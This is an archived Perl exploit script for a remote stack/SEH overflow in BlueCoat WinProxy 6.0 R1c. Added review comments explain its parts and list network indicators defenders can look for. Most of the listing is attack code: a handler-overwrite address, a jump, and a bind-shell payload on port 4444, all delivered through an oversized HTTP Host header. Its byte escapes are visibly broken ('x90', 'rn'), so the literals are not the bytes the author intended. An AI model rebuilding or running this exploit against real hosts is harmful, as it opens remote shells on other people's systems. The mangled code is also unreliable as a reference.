# Title : BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit
# Published : 2006-01-07
# Author : FistFuXXer
#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author: FistFucker (aka FistFuXXer)
# e-Mail: FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#
use IO::Socket;
#
# Script layout (as archived): target address and port, then the three
# pieces that are concatenated into one oversized HTTP Host header -- an
# SEH overwrite address, a short jump, and a bind-shell payload -- followed
# by a single HTTP/1.0 request. Nothing is read back; success is assumed.
#
# NOTE(review): throughout this listing the "\x.." byte escapes and the
# "\r\n" / "\n" sequences appear with the backslash lost in extraction
# (e.g. "x90", "rn", "nn"), so the literals below are plain ASCII and the
# script is not runnable as archived -- confirm against the original
# listing. The author's comments describe the intended bytes.
#
# Style: no `use strict;`/`use warnings;`, so every variable here is a
# package global.
#
# destination IP address
#
$ip = '127.0.0.1';
#
# destination TCP port
#
$port = 80;
#
# SE handler. 0x00, 0x0a, 0x0d free
#
# Address the author overwrites the SEH record's handler slot with; it is
# passed through reverse() so it goes on the wire byte-reversed
# (little-endian). The author identifies it as a POP/POP/RET gadget in
# PAVDLL. Defender's view: the handler-overwrite technique is what
# SafeSEH-style protections on the handler chain, and the vendor fix for
# CAN-2005-4085, are meant to stop.
#
$seh = reverse( "x01x03x12x40" ); # POP/POP/RET
# PAVDLL.01031240
#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
# Placed immediately before $seh in the request below; per the author's
# comment it jumps forward, over the handler address, into the filler that
# precedes $sc.
#
$jmp = "x90x90xebx32"; # [NOP][NOP][JMP|JMP]
#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
# Per the author's line above, the payload is a Metasploit-generated bind
# shell listening on TCP 4444 (the closing status message says the same).
# On an affected host, a new listener on 4444 owned by the proxy process is
# the post-exploitation indicator to look for.
#
$sc = "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x26".
"x8cx6dxa3x83xebxfcxe2xf4xdaxe6x86xeexcex75x92x5c".
"xd9xecxe6xcfx02xa8xe6xe6x1ax07x11xa6x5ex8dx82x28".
"x69x94xe6xfcx06x8dx86xeaxadxb8xe6xa2xc8xbdxadx3a".
"x8ax08xadxd7x21x4dxa7xaex27x4ex86x57x1dxd8x49x8b".
"x53x69xe6xfcx02x8dx86xc5xadx80x26x28x79x90x6cx48".
"x25xa0xe6x2ax4axa8x71xc2xe5xbdxb6xc7xadxcfx5dx28".
"x66x80xe6xd3x3ax21xe6xe3x2exd2x05x2dx68x82x81xf3".
"xd9x5ax0bxf0x40xe4x5ex91x4exfbx1ex91x79xd8x92x73".
"x4ex47x80x5fx1dxdcx92x75x79x05x88xc5xa7x61x65xa1".
"x73xe6x6fx5cxf6xe4xb4xaaxd3x21x3ax5cxf0xdfx3exf0".
"x75xdfx2exf0x65xdfx92x73x40xe4x7cxffx40xdfxe4x42".
"xb3xe4xc9xb9x56x4bx3ax5cxf0xe6x7dxf2x73x73xbdxcb".
"x82x21x43x4ax71x73xbbxf0x73x73xbdxcbxc3xc5xebxea".
"x71x73xbbxf3x72xd8x38x5cxf6x1fx05x44x5fx4ax14xf4".
"xd9x5ax38x5cxf6xeax07xc7x40xe4x0excexafx69x07xf3".
"x7fxa5xa1x2axc1xe6x29x2axc4xbdxadx50x8cx72x2fx8e".
"xd8xcex41x30xabxf6x55x08x8dx27x05xd1xd8x3fx7bx5c".
"x53xc8x92x75x7dxdbx3fxf2x77xddx07xa2x77xddx38xf2".
"xd9x5cx05x0exffx89xa3xf0xd9x5ax07x5cxd9xbbx92x73".
"xadxdbx91x20xe2xe8x92x75x74x73xbdxcbx58x54x8fxd0".
"x75x73xbbx5cxf6x8cx6dxa3";
print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."nn";
#
# Connect to the target with a 2-second timeout. On failure the low-
# precedence `or` runs print (which returns true), which chains into
# exit(1), so the script stops instead of calling send() on undef.
#
$sock = IO::Socket::INET->new
(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
print "[+] Connected.n";
print "[+] Trying to overwrite SE handler...n";
#
# One HTTP/1.0 request in two sends: the request line, then a Host header
# whose value is "127.0.0.1:" followed by 23 filler units, $jmp, $seh,
# 50 more filler units and $sc, terminated by the blank line that ends the
# headers. The whole overflow is carried by the length and content of this
# one header, so an upstream proxy or WAF that caps Host header length
# and rejects non-printable bytes in it would drop the request before it
# reaches WinProxy; a Host value of several hundred bytes is also a simple
# network signature for this exploit. Neither send() return value nor any
# server response is checked.
#
$sock->send( "GET / HTTP/1.0rn" );
$sock->send( 'Host: 127.0.0.1:'. "x90" x 23 . $jmp . $seh . "x90" x 50 . $sc ."rnrn" );
# Printed unconditionally -- the script never verifies that the overflow
# or the payload actually worked.
print "[+] Done. Now check for bind shell on $ip:4444!";
close($sock);